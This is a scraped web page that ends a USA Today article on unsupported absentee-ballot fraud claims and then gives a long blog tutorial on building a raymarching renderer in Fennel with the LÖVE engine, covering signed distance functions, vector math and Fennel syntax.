The Heritage database also illustrates an aggressive system capable of catching and harshly punishing violators. When a Washington state woman registered her dog and put his paw print on an absentee ballot, she risked felony charges. Forging his ex-wife’s name on her ballot earned the former head of the Colorado Republican Party four years on probation.

“The mechanisms to safeguard the integrity of the vote are in place in every jurisdiction in the country,” said Chatham, the former Texas prosecutor. “Anybody who says differently hasn’t done the research that I have. They haven’t done the research at all and they just want to believe in conspiracy theories.”

USA TODAY Network reporters Zac Anderson, Joey Garrison, Jimmie Gates, Frank Gluck, Eric Litke, Brian Lyman, Will Peebles and Katie Sobko contributed to this report

EDITOR’S NOTE: This story is part of an ongoing investigation by Columbia Journalism Investigations, the PBS series FRONTLINE and USA TODAY NETWORK reporters that examines allegations of voter disenfranchisement and how the pandemic could impact turnout. It includes the film Whose Vote Counts, premiering on PBS and online Oct. 20 at 10 p.m. EST/9 p.m. CST.

This article originally appeared on USA TODAY: Trump’s absentee ballot fraud claims not supported by evidence

Continue Reading

Latest

Raymarching with Fennel and LÖVE – Andrey Orst 

Mish Boyka

Published

on

 

Previously I’ve decided to implement a rather basic raycasting engine in ClojureScript.
It was a lot of fun, an interesting experience, and ClojureScript was awesome.
I’ve implemented small labyrinth game, and thought about adding more features to the engine, such as camera shake, and wall height change.
But when I’ve started working on these, I quickly understood, that I’d like to move on to something more interesting, like real 3D rendering engine, that also uses rays.

Obviously, my first though was about writing a ray-tracer.
This technique is wide known, and gained a lot of traction recently.
With native hardware support for ray tracing, a lot of games are using it, and there are a lot of tutorials teaching how to implement one.
In short, we cast a bunch of rays in 3D space, and calculate their trajectories, looking for what ray will hit and bounce off.
Different materials have different bounce properties, and by tracing rays from camera to the source of light, we can imitate illumination.
There are also a lot of different approaches how to calculate bouncing, e.g. for global illumination, and ambient light, but I’ve felt that it is a rather complicated task, for a weekend post.
And unlike raycasting, most ray-tracers require polygonal information in order to work, where raycasting only need to know wall start and end points.

I’ve wanted a similar approach for 3D rendering, where we specify an object in terms of it’s mathematical representation.
Like for sphere, we’ll just specify coordinate of a center, and a radius, and our rays will find intersection points with it, providing us a sufficient data to draw this sphere on screen.
And recently, I’ve read about a similar technique, that uses rays for drawing on screen, but instead of casting infinite rays as in raycasting, it marches a ray in terms of steps.
And it also uses a special trick, to make this process very optimized, therefore we can use it for rendering real 3D objects.

I’ve decided to structure this post similarly to the one about raycasting, so this will be another long-read, often more about Fennel rather than raymarching, but at the end I promise that we’ll get something that looks like this:

So, just as in raycasting, first we need to do is to understand how raymarching engine works on paper.

Raymarching basics

Raymarching can be illustrated similarly to raycaster, except it requires more steps until we could render our image.
First, we need a camera, and an object to look at:

Our first step would to cast a ray, however, unlike with raycasting, we’ll cast a portion of a ray:

We then check, if the ray intersects with the sphere.
It’s not, so we do one more step:

It’s not intersecting yet, so we repeat again:

Oops, ray overshoot, and is now inside the sphere.
This is not really good option for us, as we want for our rays to end directly at the object’s surface, without calculating intersection point with the object itself.
We can fix this by casting shorter ray:

However, this is very inefficient!
And besides, if we’ll change the angle a bit or move the camera, we will overshoot again.
Which means that we’ll either have incorrect result, or require a very small step size, which will blow up computation process.
How we can fix this?

Distance estimation

The solution to this is a signed distance function, or a so called Distance Estimator.
Imagine if we knew how far we are from the object at any point of time?
This would mean that we can shoot a ray of this length in any direction and still don’t hit anything.
Let’s add another object to the scene:

Now, let’s draw two circles, which will represent distances from the objects, to the point from where we’ll cast rays:

We can see, that there are two circles, and one is bigger than another.
This means, that if we choose the shortest safe distance, we can safely cast ray in any direction and not overshoot anything.
For example, let’s cast a ray towards the square:

We can see, that we haven’t reached the square, but more importantly we did not overshoot it.
Now we need to march the ray again, but what distance should it cover?
To answer this question, we need to take another distance estimation from ray end to the objects in the scene:

Once again we choose shorter distance, and march towards the square, then get the distance again, and repeat the whole process:

You can see that with each step the distance to the object becomes smaller, and thus we will never overshoot the object.
However this also means, that we will take a lot of really small steps, until we finally fully hit the object, if we ever do.
This is not a good idea, because it is even more inefficient than using fixed distance, and produces too accurate results, which we don’t really need.
So instead of marching up until we exactly hit the object, we will march enough times.
E.g. until the distance to the object is small enough, then there’s no real point to continue marching, as it is clear that we will hit the object soon.
But this also means, that if the ray goes near the edge of an object, we do a lot of expensive steps of computing distance estimations.

Here’s a ray that is parallel to the side of the square, and marches towards the circle:

We do a lot of seemingly pointless measurements, and if a ray was closer to the square’s side, we would do even more steps.
However this also means, that we can use this data (since we’re already computed it) to render such things as glow, or ambient occlusion.
But more on this later.

Once ray hit an object we have all the data we need.
Ray represents a point on the screen, and the more rays we cast the higher resolution of our image will be.
And since we’re not using triangles to represent objects, our spheres will always be smooth, no matter how close we are to it, because there’s no polygons involved.

This is basically it.
Ray marching is quite simple concept, just like raycaster, although it’s a bit more complicated, as we do have to compute things in 3D space now.
So let’s begin implementing it by installing required tools, and setting up the project.

Project structure

As you know from the title we will use two main tools to create ray-marcher, which are LÖVE, a free game engine, and Fennel the programming language.
I’ve chosen Fennel, because it is a Lisp like language, that compiles to Lua, and I’m quite a fan of Lisps.
But we also needed to draw somewhere, and I know no GUI toolkit for Lua.
But there is LÖVE – a game engine that runs Lua code, which is capable on running on all systems, thus a perfect candidate for our task.

Installation steps may differ per operating system, so please refer to manuals, .
At the time of writing this post I’m using Fedora GNU/Linux, so for me it means:

$ sudo dnf install love luarocks readline-devel
$ luarocks install --local fennel
$ luarocks install --local readline # requires readline-devel
$ export PATH="$PATH:$HOME/.luarocks/bin"

It’s better to permanently add $HOME/luarocks/bin (or another path, if your installation differs) to the PATH variable in your shell, in order to be able to use installed utilities without specifying full path every time.
You can test if everything is installed correctly, by running fennel in you command line.

$ fennel
Welcome to Fennel 0.5.0 on Lua 5.3!
Use (doc something) to view documentation.
>> (+ 1 2 3)
6
>>

For other distributions installation steps may vary, and for Windows, I think it’s safe to skip the readline part, which is fully optional, but makes editing in a REPL a bit more comfortable.

Once everything is installed, let’s create the project directory, and the main.fnl file, where we will write our code.

$ mkdir love_raymarching
$ cd love_raymarching
$ touch main.fnl

And that’s it!
We can test if everything works by adding this code to main.fnl:

(fn love.draw []
  (love.graphics.print "It works!"))

Now we can compile it with fennel --compile main.fnl > main.lua, thus producing the main.lua file, and run love . (dot is intentional, it indicates current directory).

A window should appear, with white text It works! in upper left corner:

Now we can begin implementing our raymarcher.

Scene setup

Just as in raycaster, we need a camera that will shoot rays, and some objects to look at.
Let’s begin by creating a camera object, that will store coordinates and rotation information.
We can do so, by using var to declare a variable that is local to our file, and that we can later change with set:

(var camera {:pos [0.0 0.0 0.0]
             :x-rotate 0.0
             :z-rotate 0.0})

For those unfamiliar with Lisps, and especially Clojure, let me quickly explain what this syntax is.
If you know this stuff, feel free to skip this part.

We start by using a var special form, that binds a value to a name like this: (var name value).
So if we start the REPL, using fennel command in the shell, and write (var a 40), a new variable a will be created.
We then can check, that it has the desired value by typing a, and pressing return:

We can then alter the contents of this variable by using set special form, which works like this (set name new-value):

>> (set a (+ a 2))
>> a
42

Now to curly and square brackets.
Everything enclosed in curly braces is a hashmap.
We can use any Lua value as our key, and the most common choice is a string, but Fennel has additional syntax for defining keys – a colon followed by a word: :a.
This is called a keyword, and in Fennel it is essentially the same as "a", but we don’t need to write a pair of quotes.
However keywords can’t contain spaces, and some other symbols.

So writing this {:a 0 :b 2 :c :hello} in the REPL will make a new table, that holds three key value pairs, which we can later get with another syntax – the dot ..
Combining it with var, we can see that it works:

>> (var m {:a 1 :b 2 :c :hello})
>> (. m :b)
2

There’s also a shorthand for this syntax, that is, we can type m.b and access the :b key’s value:

Notice that even though we’ve specified the value for :c as :hello, the REPL printed it to us as "hello".

We’re left with square brackets now, and this is plain simple vector.
It can grow and shrink, and store any Lua values in it:

>> [0 :a "b c" (fn [x] x)]
[0 "a" "b c" #<function: 0x56482230e090>]

However Lua doesn’t really have vectors or arrays, and it utilizes tables for this, where keys are simply indexes.
So the code above is equivalent to this Fennel expression {1 0 2 "a" 3 "b c" 4 (fn [x] x)}, but we can use square brackets for convenience.

Note, that we can combine indexed tables (vectors) and ordinary tables (hashmaps) together.
We can do it as shown above, by specifying indexes as keys, or define a vector var and set a key in it to some value:

>> (var v [0 1 :a])
>> (set v.a 3)
>> v
{:a 3
 1 0
 2 1
 3 "a"}

So camera is essentially a Lua table, that stores keys :pos, :x-rotate, and :y-rotate, each storing a respective value.
We use a vector as our position, and two floats as our rotation angles.
Now we can make objects, but before that, we need a scene to store those objects:

Yep, that’s our scene.
Nothing fancy, simply an empty vector to which we will later add objects.

Now we can create these objects, so let’s start with perhaps the simplest one – a sphere.
And I’ll also briefly explain what makes raymarching different from other methods of creating 3D graphics.

Creating objects

What is a sphere?
That depends on the domain, we’re working in.
Let’s open up Blender, remove the default cube, and create sphere with Shift+a, Mesh, UV Sphere:

To me, this looks nothing like a sphere, because it consists out of rectangles.
However if we subdivide the surface, we can get more correct representation:

This looks more like a sphere, but this is still just an approximation.
Theoretically, if we move very close to it, we will see the edges and corners, especially with flat shading.
Also, each subdivision adds more points, and it gets more and more expensive to compute:

We have to make these trade-offs, because we don’t need very accurate spheres, when we need real time processing.
But raymarching doesn’t have this limitation, because sphere in raymarching is defined by the point and radius length.
Which we can then work with by using signed distance function.

So let’s create a function, that will produce sphere:

(fn sphere [radius pos color] ➊
  (let [[x y z] ➋ (or pos [0 0 0])
        [r g b] (or color [1 1 1])]
    {:radius (or radius 5)
     :pos [(or x 0) (or y 0) (or z 0)]
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf sphere-distance ➌}))

There’s a lot of stuff going on, so let’s dive into it.

This is a so called constructor – a function, that takes some parameters and constructs an object with these parameters applied, then returns it.
In most typed languages we would define a class, or structure to represent this object, however in Fennel (and hence in Lua) we can just use a table.
And this is my favorite part of such languages.

So we used fn special form to create a function named sphere, that takes three parameters: radius, position in space pos, and color ➊.
Then we see another special form let.
It is used to introduce locally scoped variables, and has another nice property – destructuring ➋.

Let’s quickly understand how let works in this case.
If you know how destructuring works, you can skip this part.

Here’s a simple example:

>> (let [a 1
         b 2]
     (+ a b))
3

We’ve introduced two local variables a and b, which hold values 1 and 2 respectively.
Then we’ve computed their sum and returned it as a result.

This is good, but what if we wanted to compute a sum of three vector elements multiplied by b?
Let’s put a vector into a:

>> (let [a [1 2 3]
         b 2]
     <???>)

There are many ways to do this, such as reduce over a vector with a function that sums elements, or get values from the vector in a loop, and put those into some local variable.
However, in case of our project, we always know exactly how many elements there will be, so we can just take these out by indexes without any kind of loop:

>> (let [a [1 2 3]
         b 2
         a1 (. a 1)
         a2 (. a 2)
         a3 (. a 3)]
     (* (+ a1 a2 a3) b))
12

Yet, this is very verbose, and not really good.
We can make it a bit less verbose by skipping local variable definitions and use values directly in the sum:

>> (let [a [1 2 3]
         b 2]
     (print (.. "value of second element is " (. a 2)))
     (* (+ (. a 1) (. a 2) (. a 3)) b))
value of sectond element is 2
12

However, again, this isn’t really great, as we have to repeat the same syntax three times, and what if we want to use second value from the vector in several places?
Like here, I’ve added print since I particularly about second element’s value, and want to see it in the log, but I have to repeat myself and get second element twice.
We could use a local binding for this, but we don’t want to do this manually.

That’s where destructuring comes in handy, and trust me, it is a very handy thing.
We can specify a pattern, that is applied to our data, and binds variables for us like this:

>> (let [[a1 a2 a3] [1 2 3]
         b 2]
     (print (.. "value of second element is " a2))
     (* (+ a1 a2 a3) b))
value of sectond element is 2
12

Which works somewhat like this:

[1  2  3]
 ↓  ↓  ↓
[a1 a2 a3]

This is much shorter than any of previous examples, and allows us to use any of vector values in several places.

We can also destructure maps like this:

>> (var m {:a-key 1 :b-key 2})
>> (let [{:a-key a
          :b-key b} m]
     (+ a b))
3

And this also has a shorthand for when the name of the key and the name of desired local binding will match:

>> (var m {:a 1 :b 2})
>> (let [{: a : b} m]
     (+ a b))
3

Which is even shorter.

All this essentially boils down to this kind of Lua code:

-- vector destructuring
-- (let [[a b] [1 2]] (+ a b))
local _0_ = {1, 2}
local a = _0_[1]
local b = _0_[2]
return (a + b)

-- hashmap destructuring
-- (let [{: a : b} {:a 1 :b 2}] (+ a b))
local _0_ = {a = 1, b = 2}
local a = _0_["a"]
local b = _0_["b"]
return (a + b)

Which is nothing special really, but this example still shows the power of Lisp’s macro system, in which destructuring is implemented.
But it gets really cool when we use this in function forms, as we will see later.

If we were to call (sphere) now, we would get an error, because we specified a value ➌ for a key :sdf, that doesn’t yet exist.
SDF stands for Signed Distance Function.
That is, a function, that will return the distance from given point to an object.
The distance is positive when the point is outside of the object, and is negative when the point is inside the object.

Let’s define an SDF for a sphere.
What’s great about spheres, is that to compute the distance to the sphere’s surface, we only need to compute distance to the center of the sphere, and subtract sphere’s radius from this distance.

Let’s implement this:

(local sqrt math.sqrt) ➊

(fn sphere-distance [{:pos [sx sy sz] : radius} [x y z]] ➋
  (- (sqrt (+ (^ (- sx x) 2) (^ (- sy y) 2) (^ (- sz z) 2)))
     radius))

For performance reasons we declare math.sqrt as a local variable sqrt, that holds function value, to avoid repeated table lookup.

As was later pointed out, Luajit does optimize such calls, and there is no repeated lookup for method calls.
This is still ture for plain Lua, so I’m going to keep this as is, but you can skip all these local definitions if you want and use methods directly.

And at ➋ we again see destructuring, however not in the let block, but in the function argument list.
What essentially happens here is this – function takes two parameters, first of which is a hashmap, that must have a :pos keyword associated with a vector of three numbers, and a :radius keyword with a value.
Second parameter is simply a vector of three numbers.
We immediately destructuring these parameters into a set of variables local to the function body.
Hashmap is being destructured into sphere position vector, which is immediately destructured to sx, sy, and sz, and a radius variable storing sphere’s radius.
Second parameter is destructured to x, y, and z.
We then compute the resulting value by using the formula from above.
However, Fennel and Lua only understand definitions in the order from the top to the bottom, so we need to define sphere-distance before sphere.

Let’s test our function by passing several points and a sphere of radius 5:

>> (sphere-distance (sphere 5) [5 0 0])
0.0
>> (sphere-distance (sphere 5) [0 15 0])
10.0
>> (sphere-distance (sphere 5) [0 0 0])
-5.0

Great!
First we check if we’re on the sphere’s surface, because the radius of our sphere is 5, and we’ve set x coordinate to 5 as well.
Next we check if we’re 10 something away from the sphere, and lastly we check that we’re inside the sphere, because sphere’s center and our point both are at the origin.

But we also can call this function as a method with : syntax:

>> (local s (sphere))
>> (s:sdf [0 0 0])
-5

This works because methods in Lua are a syntactic sugar.
When we write (s:sdf p) it is essentially equal to (s.sdf s p), and our distance function takes sphere as it’s first parameter, which allows us to utilize method syntax.

Now we need a distance estimator – a function that will compute distances to all object and will return the shortest one, so we could then safely extend our ray by this amount.

(local DRAW-DISTANCE 1000)

(fn distance-estimator [point scene]
  (var min DRAW-DISTANCE)
  (var color [0 0 0])
  (each [_ object (ipairs scene)]
    (let [distance (object:sdf point)]
      (when (< distance min)
        (set min distance)
        (set color (. object :color)))))
  (values min color))

This function will compute the distance to each object in the scene from given point, using our signed distance functions, and will choose the minimum distance and a color of this ray.
Even though it makes little sense to return color from distance-estimator, we’re doing this here because we don’t want to compute this whole process again just to get the color of the endpoint.

Let’s check if this function works:

>> (distance-estimator [5 4 0] [(sphere) (sphere 2 [5 7 0] [0 1 0])])
1.0     [0 1 0]

It works, we obtained the distance to second sphere, and it’s color, because the point we’ve specified was closer to this sphere than to the other.

With the camera, object, a scene, and this function we have all we need to start shooting rays and rendering this on screen.

Marching ray

Just as in raycaster, we cast rays from the camera, but now we do it in 3D space.
In raycasting our horizontal resolution was specified by an amount of rays, and our vertical resolution was basically infinite.
For 3D this is not an option, so our resolution now depends on the 2D matrix of rays, instead of 1D matrix.

Quick math.
How many rays we’ll need to cast in order to fill up 512 by 448 pixels?
The answer is simple – multiply width and height and here’s the amount of rays you’ll need:

A stunning 229376 rays to march.
And each ray has to do many distance estimations as it marches away from the point.
Suddenly, all that micro optimizations, like locals for functions do not feel that unnecessary.
Let’s hope for the best and that LÖVE will handle real time rendering.
We can begin by creating a function that marches single ray in the direction our camera looks.
But first, we need to define what we would use to specify coordinates, directions and so on in our 3D space.

My first attempt was to use spherical coordinates to define ray direction, and move points in 3D space relatively to camera.
However it had a lot of problems, especially when looking at objects at angles different from 90 degrees.
Like here’s a screenshot of me looking at the sphere from the “front”:

And here’s when looking from “above”:

And when I’ve added cube object, I’ve noticed a slight fish-eye distortion effect:

Which was not great at all.
So I’ve decided that I would remake everything with vectors, and make a proper camera, with “look-at” point, will compute projection plane, and so on.

And to do this we need to be able to work with vectors – add those, multiply, normalize, e.t.c.
I’ve wanted to refresh my knowledge on this topic, and decided not to use any existing library for vectors, and implement everything from scratch.
It’s not that hard.
Especially when we already have vectors in the language, and can destructure it to variables with ease.

So we need these basic functions:

  • vec3 – a constructor with some handy semantics,
  • vec-length – function that computes magnitude of vector,
  • arithmetic functions, such as vec-sub, vec-add, and vec-mul,
  • and other unit vector functions, mainly normalize, dot-product, and cross-product.

Here’s the source code of each of these functions:

(fn vec3 [x y z]
  (if (not x) [0 0 0]
      (and (not y) (not z)) [x x x]
      [x y (or z 0)]))

(fn vec-length [[x y z]]
  (sqrt (+ (^ x 2) (^ y 2) (^ z 2))))

(fn vec-sub [[x0 y0 z0] [x1 y1 z1]]
  [(- x0 x1) (- y0 y1) (- z0 z1)])

(fn vec-add [[x0 y0 z0] [x1 y1 z1]]
  [(+ x0 x1) (+ y0 y1) (+ z0 z1)])

(fn vec-mul [[x0 y0 z0] [x1 y1 z1]]
  [(* x0 x1) (* y0 y1) (* z0 z1)])

(fn norm [v]
  (let [len (vec-length v)
        [x y z] v]
    [(/ x len) (/ y len) (/ z len)]))

(fn dot [[x0 y0 z0] [x1 y1 z1]]
  (+ (* x0 x1) (* y0 y1) (* z0 z1)))

(fn cross [[x0 y0 z0] [x1 y1 z1]]
  [(- (* y0 z1) (* z0 y1))
   (- (* z0 x1) (* x0 z1))
   (- (* x0 y1) (* y0 x1))])

Since we already know how destructuring works, it’s not hard to see what these functions do.
vec3, however, has some logic in it, and you can notice that if has three outcomes.
if in Fennel is more like cond in other lisps, which means that we can specify as many else if as we want.

Therefore, calling it without arguments produces a zero length vector [0 0 0].
If called with one argument, it returns a vector where each coordinate is set to this argument: (vec 3) will produce [3 3 3].
In other cases we either specified or not specified z, so we can simply create a vector with x, y, and either 0 or z.

You may wonder, why this is defined as functions, and why didn’t I implemented operator overloading, so we could simply use + or * to compute values?
I’ve tried this, however this is extremely slow, since on each operation we have to do lookup in meta-table, and this is like really slow.

Here’s a quick benchmark:

(macro time [body]
  `(let [clock# os.clock
         start# (clock#)
         res# ,body
         end# (clock#)]
     (print (.. "Elapsed " (* 1000 (- end# start#)) " ms"))
     res#))

;; operator overloading
(var vector {})
(set vector.__index vector)

(fn vec3-meta [x y z]
  (setmetatable [x y z] vector))

(fn vector.__add [[x1 y1 z1] [x2 y2 z2]]
  (vec3-meta (+ x1 x2) (+ y1 y2) (+ z1 z2)))

(local v0 (vec3-meta 1 1 1))
(time (for [i 0 1000000] (+ v0 v0 v0 v0)))

;; basic functions
(fn vec3 [x y z]
  [x y z])

(fn vector-add [[x1 y1 z1] [x2 y2 z2]]
  (vec3 (+ x1 x2) (+ y1 y2) (+ z1 z2)))

(local v1 (vec3 1 1 1))
(time (for [i 0 1000000] (vector-add (vector-add (vector-add v1 v1) v1) v1)))

If we run it with lua interpreter, we’ll see the difference:

$ fennel --compile test.fnl | lua
Elapsed 1667.58 ms
Elapsed 1316.078 ms

Testing this with luajit claims that this way is actually faster, however, I’ve experienced major slowdown in the renderer – everything ran about 70% slower, according to the frame per second count.
So functions are okay, even though are much more verbose.

Now we can define a march-ray function:

(fn move-point [point dir distance] ➊
  (vec-add point (vec-mul dir (vec3 distance))))

(local MARCH-DELTA 0.0001)
(local MAX-STEPS 500)

(fn march-ray [origin direction scene]
  (var steps 0)
  (var distance 0)
  (var color nil)

  (var not-done? true) ➋
  (while not-done?
    (let [➍ (new-distance
              new-color) (-> origin
                             (move-point direction distance)
                             (distance-estimator scene))]
      (when (or (< new-distance MARCH-DELTA)
                (>= distance DRAW-DISTANCE)
                (> steps MAX-STEPS) ➌)
        (set not-done? false))
      (set distance (+ distance new-distance))
      (set color new-color)
      (set steps (+ steps 1))))
  (values distance color steps))

Not much, but we have some things to discuss.

First, we define a function to move point in 3D space ➊.
It accepts a point, which is a three dimensional vector, a direction vector dir, which must be normalized, and a distance.
We then multiply direction vector by a vector that consists of our distances, and add it to the point.
Simple and easy.

Next we define several constants, and the march-ray function itself.
It Defines some local vars, that hold initial values, and uses a while loop to march given ray enough times.
You can notice, that at ➋ we created a not-done? var, that holds true value, and then use it in the while loop as our test.
And you also can notice that at ➌ we have a test, in case of which we set not-done? to false and exit the loop.
So you may wonder, why not to use for loop instead?
Lua supports index based for loops.
Fennel also has a support for these.
So why use while with a variable?

Because Fennel has no break special form for some reason.

Here’s a little rant.
You can skip it if you’re not interested in me making unconfirmed inferences about Fennel :).

I think that Fennel doesn’t support break because Fennel is influenced by Clojure (correct me if I’m wrong), and Clojure doesn’t have break either.
However, looping in Clojure is a bit more controllable, as we choose when we want to go to next iteration:

(loop [i 0]
  ;; do stuff
  (when (< i 10)
    (recur (+ i 1))))

Which means that when i is less then 10 I want you to perform another iteration.

In Fennel, however, the concept isn’t quite like this, because we have to define a var explicitly, and put it into while test position:

(var i 0)
(while (< i 10)
  ;; do stuff
  (set i (+ i 1)))

You may not see the difference, but I do.
This also can be trivially expressed as a for loop: (for [i 0 10] (do-stuff)).
However, not every construct can be defined as for loop, when we don’t have break.
And in Clojure we don’t have to declare a variable outside the loop, since loop does it for us, but the biggest difference is here:

(loop [i 0]
  (when (or (< i 100)
            (< (some-foo) 1000))
    (recur (inc i))))

Notice, that we’re looping until i reaches 100, or until some-foo returns something greater than 1000.
We can easily express this as for loop in Lua:

for i = 0, 100 do
   if some_foo() > 1000 then
      break
   end
end

However we can’t do the same in Fennel, because there’s no break.
In this case we could define i var, put some_foo() < 1000 to the while loop test, and then use break when i reaches 100, like this:

(var i 0)
(while (or (< i 100)
           (< (some-foo) 1000))
  (set i (+ i 1)))

Which is almost like Clojure example, and you may wonder why do I complain, but in case of march-ray function we can’t do this either!
Because the function we call returns multiple values, which we need to destructure ➍ to be able to test those.
Or in some loops such function may depend on the context of the loop, so it has to be inside the loop, not in the test.

So not having break, or ability to control when to go to next iteration is a serious disadvantage.
Yes, Clojure’s recur is also limited, since it must be in tail position, so you can’t use it as continue or something like that.
But it’s still a bit more powerful construct.
I’ve actually thought about writing a loop macro, but it seems that it’s not as easy to do in Fennel, as in Clojure, because Fennel lacks some inbuilt functions to manipulate sequences.
I mean it’s totally doable, but requires way too much work compared to defining a Boolean var and setting it in the loop.

At ➍ we see syntax that I didn’t covered before: (let [(a b) (foo)] ...).
Many of us, who familiar with Lisp, and especially Racket may be confused.
You see, in Racket, and other Scheme implementations (that allow using different kinds of parentheses) let has this kind of syntax:

(let [(a 1)   ;; In Scheme square brackets around bindings
      (b 41)] ;; are replaced with parentheses
  (+ a b))

Or more generally, (let ((name1 value1) (name2 value2) ...) body).
However in case of march-ray function, we see a similar form, except second element has no value specified.
This is again a valid syntax in some lisps (Common Lisp, for example), as we can make a binding that holds nothing and later set it, but this is not what happens in this code, as we don’t use foo at all:

(let [(a b) (foo)]
  (+ a b))

And, since in Fennel we don’t need parentheses, and simply specify bindings as a vector [name1 value1 name2 value2 ...], another possible confusion may happen.
You may think that (a b) is a function call that returns a name, and (foo) is a function call that produces a value.
But then we somehow use a and b.
What is happening here?

But this is just another kind of destructuring available in Fennel.

Lua has 1 universal data type, called a table.
However Lua doesn’t have any special syntax for destructuring, so when function needs to return several values, you have two options.
First, you can return a table:

function returns_table(a, b)
   return {a, b}
end

But user of such function will have to get values out of the table themselves:

local res = returns_table(1, 2)
local a, b = unpack(res) -- or use indexes, e.g. local a = res[1]
print("a: " .. a .. ", b: " .. b)
-- a: 1, b: 2

But this is extra work, and it ties values together into a data structure, which may not be really good for you.
So Lua has a shorthand for this – you can return multiple values:

function returns_values(a, b)
   return a, b
end

local a, b = returns_values(1, 2)
print("a: " .. a .. ", b: " .. b)
-- a: 1, b: 2

This is shorter, and more concise.
Fennel also support this multivalue return with values special form:

(fn returns-values [a b]
  (values a b))

This is equivalent to the previous code, but how do we use these values?
All binding forms in Fennel support destructuring, so we can write this as:

(local (a b) (returns-values 1 2))
(print (.. "a: " a ", b: " b))
;; a: 1, b: 2

Same can be done with vectors or maps when defining, local, var, or global variables:

(local [a b c] (returns-vector)) ;; returns [1 2 3]
(var {😡 x :y y :z z} (returns-map)) ;; returns {:x 1 :y 2 :z 3}
(global (bar baz) (returns-values)) ;; returns (values 1 2)

And all of this works in let or when defining a function!

OK.
We’ve defined a function that marches a ray, now we need to shoot some!

Shooting rays

As with math functions, let’s define some local definitions somewhere at the top of the file:

(local love-points love.graphics.points)
(local love-dimensions love.graphics.getDimensions)
(local love-set-color love.graphics.setColor)
(local love-key-pressed? love.keyboard.isDown)
(local love-get-joysticks love.joystick.getJoysticks)

This is pretty much all we’ll need from LÖVE – two functions to draw colored pixels, one function to get resolution of the window, and input handling functions for keyboard and gamepad.
We’ll also define some functions in love namespace table (IDK how it is called properly in Lua, because it is a table that acts like a namespace) – love.load, love.draw, and others along the way.

Let’s begin by initializing our window:

(local window-width 512)
(local window-height 448)
(local window-flags {:resizable true :vsync false :minwidth 256 :minheight 224})

(fn love.load []
  (love.window.setTitle "LÖVE Raymarching")
  (love.window.setMode window-width window-height window-flags))

This will set our window’s default width and height to 512 by 448 pixels, and set minimum width and height to 256 by 224 pixels respectively.
We also add title "LÖVE Raymarching" to our window, but it is fully optional.

Now we can set love.draw function, which will shoot 1 ray per pixel, and draw that pixel with appropriate color.
However we need a way of saying in which direction we want to shoot our ray.
To define the direction we will first need a projection plane and a lookat point.

Let’s create a lookat point as a simple zero vector [0 0 0] for now:

Now we need to understand how we define our projection plane.
In our case, projection plane is a plane that is our screen, and our camera is some distance away from the screen.
We also want to be able to change our field of view, or FOV for short, so we need a way of computing the distance to projection, since the closer we are to projection plane, the wider our field of view:

We can easily compute the distance if we have an angle, which we also can define as a var:

Now we can compute our projection distance (PD), by using this formula:

Where fov is in Radians.
And to compute radians we’ll need this constant:

(local RAD (/ math.pi 180.0))

Now we can transform any angle into radians by multiplying it by this value.

At this point we know what is the distance to our projection plane, but we don’t know it’s size and position.
First, we need a ray origin (RO), and we already have it as our camera, so our ro will be equal to current value of camera.pos.
Next, we need a look-at point, and we have it as a lookat variable, which is set to [0 0 0].
Now we can define a direction vector, that will specify our forward direction:

And with this vector F if we move our point the distance that we’ve computed previously, we’ll navigate the center of our projection plane, which we can call C:

Last thing we need to know, in order to get our orientation in space, is where is up and right.
We can compute this by specifying an upward vector and taking a cross product of it and our forward vector, thus producing a vector that is perpendicular to both of these vectors, and pointing to the right.
To do this we need an up vector, which we define like this [0 0 -1].
You may wonder why it is defined with z axis negative, but this is done so positive z values actually go up as we look from the camera, and right is to the right.
We then compute the right vector as follows:

And the up vector U is a cross product of R and F. Let’s write this down as in love.draw:

(fn love.draw []
  (let [(width height) (love-dimensions)
        projection-distance (/ 1 (tan (* (/ fov 2) RAD)))
        ro camera.pos
        f (norm (vec-sub lookat ro))
        c (vec-add ro (vec-mul f (vec3 projection-distance)))
        r (norm (cross [0 0 -1] f))
        u (cross f r)]
    nil)) ;; TBD

Currently we only compute these values, but do not use those, hence the nil at the end of the let.
But now, as we know where our projection plane is, and where our right and up, we can compute the intersection point, where at given x and y coordinates of a plane in unit vector coordinates, thus defining a direction vector.

So, for each x from 0 to width and each y from 0 to height we will compute a uv-x and uv-y coordinates, and find the direction vector rd.
To find the uv-x we need to make sure it is between -1 and 1 by dividing current x by width and subtracting 0.5 from it, then multiplying by x/width.
For uv-y we only need to divide current y by height, and subtract 0.5:

(for [y 0 height]
  (for [x 0 width]
    (let [uv-x (* (- (/ x width) 0.5) (/ width height))
          uv-y (- (/ y height) 0.5)]
      nil))) ;; TBD

Now as we have uv-x and uv-y, we can compute intersection point i, by using the up and right vectors and center of the plane:

And finally compute our direction vector RD:

And now we can use our march-ray procedure to compute distance and color of the pixel.
Let’s wrap everything up:

(local tan math.tan)
(fn love.draw []
  (let [projection-distance (/ 1 (tan (* (/ fov 2) RAD)))
        ro camera.pos
        f (norm (vec-sub lookat ro))
        c (vec-add ro (vec-mul f (vec3 projection-distance)))
        r (norm (cross [0 0 -1] f))
        u (cross f r)
        (width height) (love-dimensions)]
    (for [y 0 height]
      (for [x 0 width]
        (let [uv-x (* (- (/ x width) 0.5) (/ width height))
              uv-y (- (/ y height) 0.5)
              i (vec-add c (vec-add
                            (vec-mul r (vec3 uv-x))
                            (vec-mul u (vec3 uv-y))))
              rd (norm (vec-sub i ro))
              (distance color) (march-ray ro rd scene)]
          (if (< distance DRAW-DISTANCE)
              (love-set-color color)
              (love-set-color 0 0 0))
          (love-points x y))))))

Now, if we set the scene to contain a default sphere, and place our camera at [20 0 0], we should see this:

Which is correct, because our default sphere has white as the default color.

You can notice, that we compute distance and color by calling (march-ray ro rd scene), and then check if distance is less than DRAW-DISTANCE.
If this is the case, we set pixel’s color to the color found by march-ray function, otherwise we set it to black.
Lastly we draw the pixel to the screen and repeat whole process for the next intersection point, thus the next pixel.

But we don’t have to draw black pixels if we didn’t hit anything!
Remember, that in the beginning I’ve wrote, that if we go pass the object, we do many steps, we can use this data to render glow.
So if we modify love.draw function a bit, we will be able to see the glow around our sphere.
And the closer the gay got to sphere, the stronger the glow will be:

;; rest of love.draw
(let [ ;; rest of love.draw
      (distance color steps) (march-ray ro rd scene)]
  (if (< distance DRAW-DISTANCE)
    (love-set-color color)
    (love-set-color (vec3 (/ steps 100))))
  (love-points x y))
;; rest of love.draw

Here, I’m setting color to the amount of steps divided by 100, which results in this glow effect:

Similarly to this glow effect, we can create a fake ambient occlusion – the more steps we did before hitting the surface, the more complex it is, hence less ambient light should be able to pass.
